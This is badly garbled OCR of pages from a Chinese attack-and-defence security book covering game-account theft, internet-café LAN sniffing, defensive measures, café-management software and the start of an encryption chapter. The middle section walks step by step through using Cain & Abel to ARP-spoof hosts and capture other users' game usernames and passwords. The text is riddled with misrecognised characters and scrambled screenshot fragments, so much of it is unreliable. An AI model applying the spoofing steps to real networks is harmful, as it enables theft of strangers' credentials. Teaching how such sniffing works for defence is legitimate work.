请 人 六 模式 要 求 重新 ERE) [时 认 弛 到 0) 


将 所 有 区 域 重 置 为 默认 级 别 (R) 


重 趾 自 定义 设置 


站 














打开 “Internet 选项 ”对 话 权 将 安全 级 别 设置 为 “高 " 


2) 如 条 在 网 吧 中 登录 目 己 的 游戏 账号 ， 一 定 要 警惕 网 吧 的 计算 机 上 是 否 安装 有 记录 键 
各 操作 的 软件 或 木马 。 打 开 “Windows 任务 管理 一 
器 ”窗口 ， 如 右 图 所 示 ， 查 看 是 否 有 来 历 不 明 的 程 [xe ERO) 二 证 M 者 动 tm) 
序 正在 运行 。 如 果 有 ， 则 立即 将 该 程序 结束 任务 。 || 凡 BB lS 联 国 二 | 用户 
最 好 在 上 机 前 先 使 用 木马 检查 工具 扫描 一 下 机 器 ， 卫生 名称 | P79。 有 记 ag|.crv | 内存 (。 | 拉 



































看 古 合 存 在 木马 程序 ， 并 且 重 月 计算 机 。 和 
3) 不 要 安装 和 下 载 一 些 来 历 不 明 的 软件 ， 特 | we we a0 sn oo var 

别 是 外 挂 程序 。 不 要 随便 打开 来 历 不 明 信 件 的 | 人 we ze ai 四 ss 

附件 。 Ce 





4) 在 输入 游戏 账 写 和 密码 时 ， 最 好 不 要 用 Jezda2t ee 


(Enter〉 键 和 《Tab〉 键 ， 要 使 用 蚀 位 输入 法 或 使 i came 



































用 “小 键盘 ”和 “ 密 人 ”功能 ， 这 样 可 以 防止 回 显示 所 有 用 户 的 进程 5) 
计算 机 中 的 盗 吕 木马 的 监视 进程 数 : 74 CPU 使 用 率 : 68% ”物理 内 存 : 67% 


5) a 不 要 随意 接收 或 运行 
不 明 程 序 ， 如 果 确 实 需要 ， 立 即 进行 得 毒 再 运行 。 

6) 启动 Windows 目 动 更 新 程序 ， 以 确保 所 使 用 的 操作 系统 具备 防御 最 新 木马 的 
能 力 。 


7.3 ”防范 游戏 账号 破解 


使 用 暴力 破解 网 辛 账 写 和 密码 主要 是 利用 专门 的 骏 力 破解 密码 工具 进行 破解 。 这 些 工 
上 其 主要 采用 穷 举 法 逐个 笃 试 并 破解 网 洲 的 账号 和 密码 ， 虽 然 破 解 过 程 比 较 慢 ， 却 也 是 可 以 
进行 破解 。 所 以 ,游戏 玩 家 应 该 在 玩 游 戏 的 过 程 中 保护 好 目 己 的 账号 和 和 密码， 防止 账号 
航 盗 


“Windows 任务 管理 器 ”窗口 
































164 


< 第 7 章 





网 游 与 网 吧 攻 防 


《131 纪 用 “ 目 动 记 住 客 码 ” 


一 般 的 游戏 登录 界面 都 会 为 用 户 提 供 “ 目 动 记 住 密 人 个 ”功能 ， 该 功能 为 用 户 的 登录 提 
供 了 方便 ， 但 同时 也 方便 了 黑客 外 解 账号 和 和 密码。 如 果 用 户 登 录 网 络 游 戏 时 使 用 该 功能 ， 
计算 机 束 会 日 动 将 其 账号 和 密码 保存 在 一 个 文件 中 ， 这 样 就 给 了 骏 力 破解 工具 盗 取 其 账号 
和 密码 的 机 会 。 目 前 这 类 破解 工具 很 多 ， 如 Cain & Abel 0 

Cain && Abel 是 一 个 可 以 人 破解 屏保 、PWL 密码 、 共 享 密码 、 绥 存 口 令 、 远 程 共 享 口令 、 
SMB 口令 等 的 综合 工具 。 利 用 该 工具 可 以 查看 使 用 “ Ce 伺 ” 功 能 登录 的 本 地 账户 
及 密码 。 下 和 而 通过 Cain &% Abel 软件 来 介绍 使 用 “上 自动 记 住 密码 ”功能 给 用 户 和 宙 来 的 危害 性 。 
其 体 的 使 用 操作 步骤 如 下 。 

STEP01: “Cain” 主 寡 口 STEP02: 打开 “配置 对 话 框 ”对 话 框 























别 配置 对 话 框 x| 
查看 WW) 配置 0) 工具 CX) 和 攻 助 0 
加 加 跟 赋 | | - 押 We 


challenge 欺骗 “| 过滤 与 端口 | HITTP 表 | 追踪 路 由 | 
嗅 探 器 AFR [ Mrp Poison Routing ) | 


E82 £7 | 
192. 168.0.99 255. 255. 255. 








十 当前 网 络 适配器 
ADeviceAHPF_{B658E0D8-1ED4-4BT1-B1DC-44BF98121AT91} 





安装 Cain& Abel 工 具 和 单 击 “配置 ” 回 ; 选择 本 机 的 IP 单 击 “确定 ” 
Winpcap 4.1， 双 击 桌 面 上 世 按钮 。 地 址 和 适配器 。 按钮 。 

的 “Cain 快捷 图 标 ， 打 开 

“Cain” 主 窗口 。 

STEP03: 返回 “Cain” 主 窗口 STEP04: “MAC 地 址 扫描 ” 对 话 框 


Ed 诡 件 FE) 查看 如) 配置 @) 工具 CI) 帮助 0 
| 外 @ 坟 器 册 | 十 网 和 四 DYSD: 


i ie per 
P 上 有 区 EE 











| 打 Sl: E4B18E 
| 192. 166. 1 55 0019802268T2 
| 192. 168. 1.66 00142A270656 Elitegroup Fomputer Sys... 




















一 混乱 模式 扫描 
厂 RP 测试 (传播 31- 位 ) 

















单 击 “ 嗅 探 器 ” 按 ”图 右 击 ， 从 快捷 菜单 中 选择 扫描 ”图 单 击 “ 确 定 " 按 
钮 , 查看 本 地 网 络 中 的 。 选择 “扫描 MAC 地 址 ” 的 目标 主机 。 ” 钮 即 开始 扫描 。 
主机 。 菜单 命令 。 
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全 
STEP05: 单 击 “ 噢 探 器 ”按钮 





文件 @ 查看 W) 配置 0) 工具 QT) 天助 00 
| 电 凡 @ 澡 加 El 十 名 | 时 | 种 加 虞 





和 转折 男 四 人 BB 6 


00 19E0EAB 18E 
et 


OTOL 
0015588987B1 
001E6C17B08B 
00123FA2Ad4F4 
001BFC883DFF 
00E04C0053E6 REALTEK SEMICONDUCTOR C... 
OOFEO4CODBE2C REALTEK SEMICONDUCTOR C... 
0015566AD4F6 FOXCONN 

001E8C17B077 

QO1FCBCBFDS1 


Dell Inc 


192. 188. 0.52 


7 本 


查看 整个 局 域 网 内 的 所 有 主机 的 信息 。 


STEP07: 打开 “新 建 ARP 欺骗 ”对 话 框 


a 


于 Me ty 














DO19E0E4B16E 
DO19E0228BT2 


192. 186. 0. 52 
192. 188. 0. 14 
192. 168. 0. 13 
192. 166.0. 10 
192. 168.0.9 
192. 188.0.8 
192. 168.0.7 
192. 168.0.6 


192. 168.0.5 
了 | 192 1RR nm 1 


001FC6CBFD91 
QO1ESC1TBOTT 
0015588AD4F8 
QOEO4CODBE2C 
00E04C0053Z8 
001BFC883DFF 
00123FA2A4F4 
001E6C178088 
00155889FTB1 
nn734d4AnnmRR9 


00734460D369 
DO155889FT7B1 
O01E8C17BOSB 
DO123FAZAF4 
O01BFCE83DFF 
00ED4C0053Z8 
nnRndarnnmRF2r 


在 左 侧 选择 网 关 ， 右 侧 单 证 “确定 ” 
选择 被 欺骗 的 |P 地 址 。 按钮 。 
STEP09: 打开 网 站 地 址 栏 


0 

文件 编 界 E) 查看 QV 收藏 扩 ) 工具 GD) 帮助 0 

一 - a -加 -有 时 
地 让 也 ts: jpopkart. tiancity. con/honepage/ 

二 ,世纪 天 成 首页 | 游戏 日 | 论坛 | 问 吧 | 商城 | 客服 | ; 


加 加 四 
辟 


四 区 到 注 接 * 


首 且 商城“ 购 卡 充值 








海 戏 指南 居 “ 车 [人 系统 …、 少 戏 排名 话 动 专区 | 视频 专 区 ”玩家 社区 


(Le pre “2 S 
PTFE| 


皮 载 阁 戏 


BD -~ 
Fees Cm 
| 


输入 用 户 名 和 密 
码 , 并 单 击 “ 确 定 ” 

按钮 ， 即 可 成 功 登录 
到 网 络 游戏 页 面 


加 输入 "http://popkart. 
tiancity.comM/home page/ ”， 
打开 跑 跑 卡 丁 车 游戏 登录 
界面 。 
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STEP06: 查看 已 经 存在 的 ARP 欺骗 
| 文件 外 查看 WW) 配置 @) 工具 位 ) 和 帮助 加 


习 幢 @ 坟 回回 十 了 9 导师 分 四 加 自 廊 OBD»O7?7 下 


192, 168. 1.1 
192. 168.1.1 


OO19E0E4B16E 
QO19E0E4B18E 
外 AFR-HTTIS 0) 

条 APR-EDP (0) 


@@ 配置 / 路 由 数据 包 


le wm [mon Ts 二 











国 单 击 “APR” 国 查看 已 经 国 在 空白 处 单 击 
按钮 区 。 存在 的 ARP ”并 单 击 “添加 到 列 

欺骗 。 表 ” 按 钮 用 。 
STEP08: 返回 “APR” 选 项 卡 


四 日 加 





文件 人 ) 查看 名 配置 @) 工具 帮助 0 
由 @ 直 避风 | 十 了 风 |& 和 加 加 党国 所 司 日 角 总 多 加 O? 了 Ii 







| 






BIde 192. 168.1.1 O019E0E4BI8E D019E0228B72 2 192.188.1.55 
Idle 192.168.1.1 _ 001980E4B18E 00142A270656 192.188.1.66 
息 APR-IITPS (0) 192. 168.1.66 00142A270656 DOEO4CODBE2C 192. 168.0. 10 










[ Ide 


伯 APR-RDP 0) 





| | |mc 地 址 | 逆 据 包 .. |< 数 .|MMc 地 址 |r 地 址 | 





/ 路 由 数据 包 


1 wr [Wo 


丢失 的 数据 包 : 0% 


查看 刚 添加 的 AR P 欺 驴 信 息 上 NO 


1 返回 “Cain” 主 窗口 


() 
站 十 禄 | 虽 | 6， | 下 





Rose @) 
及 Radius-Users (0) 
丹 I0g 0) 


5 IXE-PSK (0) 


MySQL (0) 
sup (0) 
sIF (0) 





单 击 “HTTP” 选 项 ， 在 右 
侧 列表 中 即 可 看 到 目标 主机 游 
戏 登 录 的 用 户 名 和 密码 。 


单 击 “ 口 令 " 
按钮 。 
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使 用 Cain 软件 可 以 很 轻松 地 和 贸 取 到 目标 主机 登录 网 络 游 戏 的 账号 和 密码 。 除 此 之 外 ， 
利用 该 工具 还 可 以 到 力 人 破解 账号 密码 。 该 工具 的 咒 探 功能 也 很 强大 ， 儿 平 可 以 捕获 到 FTP、 
HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP 等 多 种 账号 的 口令 。 





1.3.2 ”防范 方法 


为 防止 目 己 的 游戏 账 写 与 宅 码 被 黑客 暴力 破解 ， 一般 须 采 取 如 下 几 种 防御 措施 。 

1) 尽量 不 要 将 目 己 的 游戏 账号 和 密码 雄 露 在 公共 场合 和 其 他 网 站 ， 更 不 要 使 用 “日 动 
记 住 密码 ”功能 登录 游戏 。 

2) 尽 可 能 将 黎 但 设 症 得 复杂 一 些 ， 位 数 最 少 为 8 位 ， 且 需要 数字 、 字 苹 和 其 他 字符 混 
合 使 用 。 

3) 不 要 使 用 和 生日、 里 份 证 号码 、 电 话 写 码 、 居 住 的 街道 名 称 、 门 脾 写 人 码 等 作为 游戏 的 
密码 。 

4) 由 于 再 复杂 的 密码 也 可 能 被 黑客 破解 ,因此 只 有 经 常 更 换 密码 , 才能 提 局 密码 安全 系数 。 

5) 要 申请 密码 保护 ， 即 设置 安全 人 码 ， 而 且 安 全 人 码 不 要 与 密码 相同 。 由 于 安全 人 码 也 不 能 
保证 密码 不 锐 破 解 ， 因 此 用 户 在 设置 安全 人 码 后 ， 人 还 要 尺 可 能 地 你 护 目 己 的 密码 。 

6) 完善 地 官 理 用 户 登 录 权 限 和 软件 安 狂 权限 ， 并 尺 可 能 地 使 用 一 些 锁 定 软件 在 短暂 离 
开 时 锁定 计算 机 ， 避 免 他 人 非法 使 用 目 己 的 计算 机 。 





















































7.4 ”警惕 局 域 网 监听 


目前 ， 局 域 网 大 多 采用 广播 通信 方式 ， 在 广播 域 中 可 以 监听 到 所 有 的 信息 报 。 这 样 在 
局 域 网 中 进行 网 络 洲 戏 ， 黑 客 吏 可 以 通过 对 信息 包 进 行 分 析 来 锣 取 局 域 网 上 传输 的 洲 戏 账 
号 和 密码 信息 。 同 时 ， 现 在 很 多 黑客 都 会 把 局 域 网 扫描 与 监听 作为 入 侵 之 前 的 准备 工作 。 
攒 借 这 种 方式 ， 黑 客 可 以 获得 用 户 名 、 黎 码 等 重要 的 信息 ， 还 可 以 监听 别人 发 送 的 邮件 内 
容 、 即 时 聊天 信息 、 访 问 网 页 的 内 容 等 。 因 此 ， 如 果 被 黑客 进行 监听 的 话 ， 将 会 给 企业 硕 
来 巨大 的 损失 ， 所 以 要 警惕 局 域 网 的 监听 。 
































《141 了 解 监听 的 原理 


网 络 监听 是 一 种 计算 机 网 络 安全 方面 的 技术 , 其 主要 的 使 用 对 象 是 网 络 安全 管理 人 员 。 
他 们 可 以 使 用 该 项 技术 来 监视 网 络 的 状态 、 数 据 流 动情 况 以 及 网 络 上 传输 的 信息 等 。 当 信 
县 以 明文 的 形式 在 网 络 上 传输 时 ， 使 用 监听 技术 接收 网 络 上 传输 的 信息 并 不 是 一 件 难事 ， 
只 要 将 网 络 接口 设置 成 监 昕 模式 ， 即 可 将 网 上 传输 的 信息 截获 。 

现在 普通 使 用 的 以 太 网 协议 ， 其 工作 方式 是 将 要 发 大 的 数据 包 发 往 连接 在 一 起 的 所 有 
主机 ， 且 数据 包 中 包 侣 应 该 接收 数据 包 主 机 的 目标 地 址 ， 只 有 与 数据 包 中 目标 地 址 一 致 的 
那 人 台 主 机 才能 接收 。 当 主机 工作 在 监听 模式 下 ， 无 论 数 据 包 中 的 目标 地 址 是 什么 ， 主 机 都 
将 接收 ， 并 一 律 上 交 给 上 层 协议 软件 处 理 ， 这 也 就 意味 着 在 同一 条 物理 信道 上 传输 的 所 有 
于 轧 都 可 以 被 接收 到 。 如 末 接 收 到 的 信息 是 以 明文 有 发送 的 ， 则 其 中 所 有 的 信息 都 将 展现 在 
接收 者 面前 ， 而 且 现 在 网 络 上 的 信息 大 多 是 以 明文 发 送 的 。 如 末 用 户 的 账户 名 和 口令 等 信 
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县 也 以 明文 的 方式 在 网 上 传输 ， 而 此 时 一 个 墨客 或 网 络 攻击 者 正在 进行 网 络 监 听 ， 这 吏 是 
目前 网 上 交易 的 账号 密码 丢失 、QQ 号 丢失 的 原因 上 所 在 。 

目前 对 网 络 洲 戏 进行 监听 的 工具 主要 有 联众 密码 监听 亏 和 边锋 密 但 监听 髓 。 这 两 个 工 
其 专门 用 来 监视 局 域 网 内 部 联众 和 边锋 网 络 游戏 登录 ， 同 时 记录 整个 局 域 网 内 部 的 联众 网 
页 登录 、 边 锋 网 页 登录 等 的 包括 账户 和 密码 在 内 的 所 有 敏感 信息 。 对 于 登录 到 洲 戏 大 厅 的 
用 户 可 以 记录 账 喜 和 密码 ， 而 对 于 登录 到 游戏 网 页 的 用 己 则 可 以 记录 用 户 在 网 页 中 输入 的 
所 有 以 POST 方式 提 区 的 表单 中 的 全 部 内 容 ， 而 且 只 要 有 一 个 客户 端 运行 了 此 关 工 具 ， 整 
个 网 吧 或 局 域 网 就 和 都 在 其 监控 之 下 。 















































人 142 了 护 汇 方 法 


对 于 黑客 来 说 ， 可 以 利用 网 络 监 昕 拷 术 很 容易 地 获得 用 户 账号 和 密码 等 关键 信息 ; 而 
对 于 入 侵 检 测 和 追踪 者 来 说 ， 网 络 监听 技术 又 能 够 在 与 黑客 的 斗争 中 发 挥 香 要 的 作用 。 因 | 
此 ， 目 前 在 局 域 网 中 还 没有 很 好 的 方法 来 防御 此 类 监听 ， 但 也 并 不 是 对 恶意 的 网 络 监 听 攻 
击 无 任何 防范 措施 。 下 面 将 介绍 儿 种 防范 网 络 监 听 的 方法 。 

1. 使 用 专门 的 密码 防盗 工具 

为 了 保护 计算 机 的 基本 设置 ， 网 吧 一 般 都 对 《Ctrl+Alt+Del〉 等 组 合 键 进行 限制 ， 使 得 
用 户 根 本 无 法 知道 是 否 有 网 络 监 昕 工具 在 运 < 行 。 不 过 ， 用 户 可 以 下 载 专门 的 密码 保护 软件 
ee 人 码 等 隐私 信息 。 和 常用 的 工具 有 传奇 密码 防盗 专家 、 网 吧 密 码 防 
盗 专 家 等 。 使 用 网 吧 密 码 防 资 专家 来 保护 网 络 游戏 账号 信息 的 具体 操作 步骤 如 下 。 


STEP01: ”打开 网 吧 密 码 防 资 专家 STEP02: ”切换 至 “消息 ”选项 卡 















































本 交 防 到 专家 东 列 分 为 : 
Wz pa 综合 个 
a lt 


人 pi A 


Ee 和 
有 


Ee 











pa 
密 
- 
到 
zl; 


和 区 二 





矿产 弛 和 态 开具 第 二 化 密码 内 存 雯 装 功能 
lv >>> 窜 入 扫描 
”启动 服务 


a pe 


内 申 注册 ! 十 分 钟 内 即 5T 鞭 取 注 册 怒 











版 积 所 有 心 ) 哄 菌 洒 安全 和 料 技 工作 室 
版 入 所 有 心 ) 全 世 坎 件 有 限 们 司 
pcphagqe 避 gmalcom 














在 “关于 ”选项 卡 中 可 看 到 该 软件 的 相关 信息 ， 单 击 “ 启 动 ”按钮 ， 程 序 即 自动 对 账号 进行 密码 
例如 使 用 先进 的 内 存 伪装 技术 ， 可 对 密码 进行 保护 ， 并 实时 捕获 各 种 隐患 的 病毒 、 木 马 、 密 码 
态 伪装 等 。 间谍 、 键 盘 记 录 、 恶 意外 挂 等 , 还 能 在 黑客 发 送 


密码 邮件 时 截获 其 邮件 账号 和 密码 。 
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STEP03: 切换 至 “配置 ”选项 卡 STEP04: ”密码 更 改 成 功 


太 网 吧 客 码 防盗 专家 网 络 版 (未 注册 ) ey Netbargp [S| 
消息 ”配置 | 关于 | 历史 | 网 络 | 新 闻 | 





- 椒 限 设置 











设置 可 疑 模块 、 在 线 国 单 击 “更改” 单 击 “OK” 按 钮 ， 即 完成 权限 设置 操作 。 
注册 用 户 、 密 码 等 。 密码 ”按钮 。 


江 密码 防 次 专家 系列 分 为 : 密码 防盗 专家 综合 版 ， 主 要 针对 个 人 用 户 设计 ; 
网吧 密码 防盗 专家 网 络 版 ， 主 要 针对 网 吧 管 理 人 员 设 计 。 这 里 使 用 的 是 网 吧 密 
生 们 。 码 防盗 专家 网 络 版 ， 如 果 是 普通 用 户 ， 则 使 用 密码 防盗 专家 综合 版 。 
STEP06: 打开 “历史 ”选项 卡 

斑 网 吧 客 码 防盗 专家 网 络 版 (未 注册 ) 








已 处 理 模块 


石 键 荣 单 可 进行 还 原 操作 














弹出 “权限 管理 ”对 话 框 ， 在 “输入 管理 密码 " 文 ”可 查看 已 处 理 的 模块 ， 还 可 以 进行 还 原 操作 。 
本 框 中 输入 设置 的 管理 密码 ， 并 单 击 “OK” 按钮 。 

STEP07: 切换 至 “网 络 ” 选 项 卡 

态 网 吧 客 码 防盗 专家 网 络 版 (未 注册 ) 


消息 | 配置 | 关于 | 历史 网 络 | 新 闻 | 
网 络 选项 





信息， 用 来 在 换 必 报名 时 区 分 

在 “权限 管理 ”对 话 框 中 输入 设置 的 管理 密码 , 即 
可 打开 “网 络 ” 选 项 卡 ， 在 其 中 可 对 网 络 选项 、 报 
警 信息 等 属性 进行 设置 。 











如 果 不 想 让 顾客 看 到 报警 信息 , 不 要 选 “ 本 地 报警 ” 
厂 远程 报警 lv 本 地 报警 
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密码 防盗 专家 还 可 以 查 杀 很 多 恶意 软件 ， 如 冰河 木马 、QQ 密码 侦探 、 广 外 幽灵 、 边 
锋 盗号 机 、 传 奇 击 键 、OICQ 密码 监听 记录 工具 、QEyes 潜伏 猎手 、 密 码 专 家 、 传 奇 游戏 在 
线 击 键 记录 、 超 级 密码 记录 木马 、 联 众 木 马 监听 器 、 按 键 记录 器 等 。 


2. 使 用 加 密 技术 








如 果 局 域 网 中 的 数据 包 经 过 加 笑 后 再 传输 ， 通 过 监听 得 到 的 信息 就 会 是 乱 码 ， 可 以 保 
护 账 号 饶 码 ， 但 是 使 用 加 密 技术 会 影响 数据 传输 速度 ， 用 户 要 座 剧 使 用 该 种 防范 措施 。 


3. 网 络 分 段 











网 络 分 段 是 将 一 个 物理 网 络 划分 为 多 个 多 辑 子 网 的 技术 。 网 络 分 段 作用 是 将 非法 用 户 











与 敏感 的 网 络 资源 相互 隔离 ， 从 而 防止 可 能 的 非法 监听 。 一 个 子 网 段 是 一 个 小 的 局 域 网 ， 
监听 的 计算 机 上 只 能 在 目 己 的 小 网 段 内 监听 ， 而 不 会 监听 别 的 子 网 段 。 还 可 以 使 用 专门 的 反 
监听 工具 ， 如 AntiSniffer， 进 行 防范 。 
4. 使 用 划分 VLAN 技术 
虚拟 局 域 网 (VLAN)， 是 根据 需要 灵活 地 加 入 不 同 的 迎 辑 子 网 中 的 一 种 网 络 拷 术 。 建 立 
了 虚拟 局 域 网 后 ， 各 个 虚拟 网 之 间 不 能 直接 进行 通信 ， 而 必须 通过 路 由 需 转 发 ， 为 高 级 的 安全 
控制 提供 了 可 能 ， 增 强 了 网 络 的 安全 性 ， 这 样 可 以 防止 大 部 分 基于 网 络 监听 的 入 侵 。 


7.5 美 滞 网管 大 师 


“ 美 薄 网 管 大 师 ” 软 件 集 实时 计时 、 计 费 、 计 账 功 能 于 一 体 ， 是 一 款 网 吧 管理 员 必 不 可 











少 的 工具 。 该 工具 既 可 单独 作为 网 吧 的 计 








强人 
页 电 














理 机 ， 也 可 配合 安全 卫士 远程 控制 整个 网 络 


内 的 所 有 计算 机 ， 也 可 以 可 对 任意 机 豆 进 行 开 通 、 俘 止 、 限 时 、 关 机 、 热 司 动 等 操作 ， 并 
品 管理 、 每 日 费用 统计 等 众多 功能 。 


使 用 “ 美 薄 网管 大 师 ” 软 件 管理 网 吧 中 计算 机 的 具体 操作 步 又 如 下 。 


且 具 有 会 员 管理 、 网 吧 商 


STEPO1: 


打开 “ 美 萍 网 管 大 师 ” 主 窗口 





和 
感 美 区 网 和 大 师 


ES 





系统 设置 ”帮助 信息 ”其 他 选项 民 钨 且 册 一 











STEP03: 返回 主 窗口 


选择 一 台 计 算 机 ( 这 里 选择 1 号 计算 机 ) ， 单 击 工 。 单 击 “是 ”按钮 ， 即 可 关闭 1 号 计算 机 。 
具 栏 中 “远程 关机 ”按钮 。 








当前 管理 员 ; system 





= 
感 美 革 网 管 大 师 


:|r | 





系统 设置 ”帮助 信息 。 其 他 选项 ”系统 运 出 








让 条 机 隐 昌 ， 人 二 二 号 | @ 9 Ww 蚂 本 
时 间 时 叶 ) 借用 附加 焉 | 降 ~ 
© 0 0 | 











bi 
0 





















单 击 “系统 设置 ”按钮 。 
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STEP02: 查看 确认 信息 
提示 信息 


你 确认 要 关闭 1 号 机 器 吗 ? 





STEP04: 查看 提示 信息 


信息 


责 人 请 脸 入 设置 客 


Tm 确定 | 





输入 系统 密码 ， 并 单 击 “ 确 定 ” 按 钮 。 


< 第 7 章 
网 游 与 网 吧 攻 防 


STEP05: 打开 “ 美 萍 软件 设置 ”对 话 框 STEP06: 切换 至 “设置 ”选项 卡 


记录 [ 设 次 ”| 计 费 | 管理 | 商品 | 
系统 选项 | 其 他 选项 | 
密码 设置 


记录 | 设置 ” 计 费 | 管理 | 商品 | 
计 费 标准 | 分 时 段 计 喝 | 上 网 程序 设置 | 会 员 计 费 | 
共通 上 机 计 足 忆 ”元 /每 小 时 _ 他 各 机 分 别 计 辟 | 
上 网 上 机 计 囊 户 。。 元 /每 小 时 _ 居 各 机 分 别 计 井 | 
最 小 计 费 金额 上 .0 元 线 。 最 低 消费 金额 | ”元 钱 ( 即 所 谓 的 开机 费用 ) 





修 吹 设置 密码 修改 退出 密码 
确认 密码 | 确认 密码 | 


-系统 设置 
JY Windows 启 动 后 自动 运行 网 管 | 网 络 中 只 人 允许 运行 一 个 网 管 大 师 


此 网 络 机 器 总 台数 为 E0” 信 | 台 机 器 
网 管 对 磁卡 条 码 卡 的 响应 时 间 是 6 ”全 | 毫秒 各 东 统 高 级 选项 | 
客户 机 状态 响应 时 间 上 ”他 种 ( 即 在 此 时 间 内 容 户 机 如 果 无 反映 则 淹 断 为 未 知 ) 








当前 时 间 区 为 最 小 计 吊 时 间 单位 的 0 六 | % 时 开始 计 费 《参见 软件 帮助 ) 

最 小 计 费 时 间 单位 [0 习 分 钟 。 上 机 时 间 小 于 | 习 分 加 的 不 收取 费用 
克 当 限 时 或 会 员 剩 5 分 钟 (元 ) 时 向 客户 机 发 出 提示 信息 计 费 结果 测 i 
克 主机 限 8 各 寺 间 到 时 需要 提示 提示 音乐 为 |: WindowsAWEDIA\The Micre Ey| 



































在 “ 计 费 ”选项 卡 中 可 对 计 费 标准 、 分 时 段 计 费 、 ”可 对 密码 和 系统 的 各 个 属性 进行 设置 。 
上 网 程序 设置 和 会 员 计 费 等 属性 进行 设置 。 


STEP07: 切换 至 “记录 ”选项 卡 STEP08: 打开 “历史 操作 记录 ”对 话 框 





显示 从 [到 年 9 月 23 日 “| | 0:00: 慑 到 [2014 年 9 月 23 日 7| |23:59 之 的 记录 国 开始 显示 





| 管理 | 商品 
历史 记录 克 显示 操作 记录 厅 显示 运行 记录 灰 显示 费用 记录 | 





-收费 历史 记录 反 
8 涉及 更 用 总 和 

以 系统 管理 员 记录 ， 1 收费 详细 统计 : 进入 网 管 大 师 

以 系统 管理 员 身份 查看 收费 历史 记录 ， 可 帅 除 记录 。 获 + 进入 网 管 设置 

De 

本 s 入 

操作 历史 记录 . 进入 网 管 设置 

2 上 < 进入 网 管 设置 

以 系统 管理 员 身 份 查看 操作 历史 记录 ， 可 星 除 记录 。 认 操作 历史 记录 | 进入 网 管 设置 

进入 了 网管 设置 

进入 网 管 设置 

查看 操作 历史 记录 。 system 
































全 取消 设置 | 9 存盘 返回 | 


单 击 “ 操 作 历史 记录 ”按钮 。 查看 主要 操作 记录 并 可 以 管理 员 身 份 删除 记录 。 
STEP09: 返回 “记录 ”选项 卡 STEP10: 打开 “客户 机 网 站 历史 记录 统计 ” 
对 话 框 


计 机 网 站 历史 记录 抠 汗 (光碟 有 安全 卫 二 V7 3 以上 县) 
rt 统计 从 | 可 本 年 9 月 23 日 >| | 0:o 到 [zol 年 9 月 23 日 | [23:59 的 记录 
[记录 ” 耻 设 置 ”| 计 费 ”| 管理 | 商品 | a 
p74 当前 文件 名 称 : 1. rec 
历史 记录 列表 另存 | 清空 记录 库 | 。 请 选择 您 要 查看 的 机 器 : [党 号 机 级 有 此 机 器 记录 , 不 能 查看 ) 


- 居 葛 历史 记录 body 上 各 梓 

















以 系统 管理 员 身份 查看 收费 历史 记录 ,可 蜡 除 记录 ”区 收费 详细 统计 








操作 历史 记录 


以 系统 管理 员 身份 查看 操作 历史 记录 ， 可 昨 除 记录 “让 操作 历史 记录 








-网 站 历史 记录 


可 查看 各 个 客户 机 上 用 户 所 浏览 网 站 的 历史 记录 具 了 网 站 历史 记录 | 




















单 击 “ 网 站 历史 记录 ”按钮 。 查看 某 台 客户 机 浏览 的 网 站 ， 从 中 可 以 判断 用 户 是 
否 进行 了 下 载 操 作 。 
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全 人 人 他 
STEP11: 返回 主 窗口 
感 美 芝 网 管 大 师 








攻防 从 入 门 到 精通 











有 容 上 
刘 盾 机 限时 开机 结 帐 停止 ”远程 关 





号 13:43:07 








| 当前 共有 0 台 机 器 在 计时 , 20 台 机 器 空闲 





当前 管理 员 ; system 





单 击 “ 会 员 管 理 ” 按 钮 网 。 
STEP13: 打开 “会 员 管 


会 员 制 管 理 





a 国 :EE 国 天 
会 员 充 值 | 新 增 会 员 | 资料 修改 | 资料 备份 | 列表 另存 | 会 员 统计 | 会 





会 员 查询 上 1: 按照 人 S 员 和 称 | | 2 
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| | 
增 会 员 、 


操作 。 


四 打开 “信息 


全 


资料 备份 、 会 


77 


提示 框 





会 员 充 值 、 新 


= 
Ua 


Ne 


统计 等 各 种 


数据 的 解密 技术 和 加 密 技 术 是 矛 与 盾 的 关系 ， 它 们 是 在 相互 斗争 中 发 展 起 
来 的 ， 永 远 没有 不 可 破解 的 加 窖 技术 。 然 而 ， 一 般 的 解密 技术 总 是 消 后 于 加 窗 
技术 ， 也 就 是 说 ， 一 般 的 解密 技术 总 是 针对 某 一 类 或 相关 加 蜜 技术 而 产生 的 。 


O 七 种 常见 的 加 密 解 密 类 型 
O 文件 和 文件 夫 密 码 攻防 
O 系统 密码 攻防 


O 加 密 精灵 、MD5 与 私人 磁盘 的 使 用 





> 
攻防 从 入 门 到 精通 





8.1 加密 与 解密 的 基础 知识 


8.1.1 认识 加 密 与 解密 


加 密 是 指 对 明文 进行 翻译 ， 使 用 不 同 的 算法 对 明文 以 代码 形式 实施 加 密 ， 加 密 后 的 内 
容 会 成 为 一 段 不 可 读 的 代码 ， 通 党 成 为 “ 密 文 ”。 人 简单 来 说 ， 束 是 可 读 异 或 可 以 直接 查看 的 
信息 ， 经 过 加 密 后 需要 输入 密码 才 可 以 查看 。 其 他 用 户 即 使 获得 了 已 加 和 密 的 信息 数据 ， 也 
会 因为 没有 密码 而 无 法 打开 并 查看 信息 内 容 。 因 此 使 得 数据 信息 得 以 保护 ， 从 而 避免 被 其 
他 用 户 非 法 鳃 取 、 阅 读 。 

解密 是 加 密 的 逆 过 程 ， 即 将 已 加 密 的 信息 转换 为 明文 ， 是 使 信息 数据 可 以 直接 阅读 的 
过 程 。 


























8.1.2 加密 的 通信 模型 


如 果 明 文 作为 加 密 和 输入 的 原始 信息 ， 用 M 表示 ; 加 密 算 法 为 变换 图 数 F; 密 文 为 加 密 
后 明文 的 变换 结果 ， 用 C 表示 。 那 么 ， 加 密 的 通信 模型 就 可 以 以 下 图 表示 。 


K 











窗 是 窗 是 











明文 ”一 > 加 密 算法 . 密 文 。 解密 算法 。 ”> 明文 
M Er C Dx M 


一 个 加 密 的 通信 模型 


术 


8.2 七 种 党 见 的 加 密 解密 类 型 


8.2.1 RAR 压缩 文件 


压缩 文件 也 是 在 日 钊 操作 中 使 用 非常 多 的 , 将 所 制作 的 文档 通过 压缩 软件 来 实施 加 密 ， 
不 仅 可 以 减 小 磁盘 空间 ， 还 可 以 更 好 地 保护 文档 。 

1. 用 WinRAR 加 密 文件 

WinRAR 是 一 球 较 WinZip 发 布 晚 的 高 效 压 缩 软件 ， 其 不 但 在 压缩 比 、 操 作 方 法 上 都 较 
WinZip 优越 ， 而 且 能 兼容 ZIP 压缩 文件 ， 可 以 文 持 RAR、ZIP、ARJ、CAB 等 多 种 压缩 格 
